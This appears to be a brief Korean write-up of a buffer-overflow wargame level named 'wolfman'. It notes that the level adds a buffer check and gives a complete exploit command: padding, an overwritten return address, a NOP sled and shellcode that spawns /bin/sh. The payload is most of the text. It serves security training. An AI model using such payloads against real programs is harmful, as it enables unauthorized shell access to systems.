이쯤되니 앞으로의 단계에 붙여질 몬스터 이름이 기대가 된다.
goblin에서 buffer hunter가 추가되었다.
goblin은 쉘코드를 buffer에 넣어서 푸는게 정석이었다보다.
그냥 goblin payload를 주소만 바꿔서 만들면 된다.
생략하고 payload는 다음과 같다.
./wolfman `python -c 'print "A"*44 + "\x80\xfb\xff\xbf" + "\x90"*200 + "\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"'`
아예 똑같다....
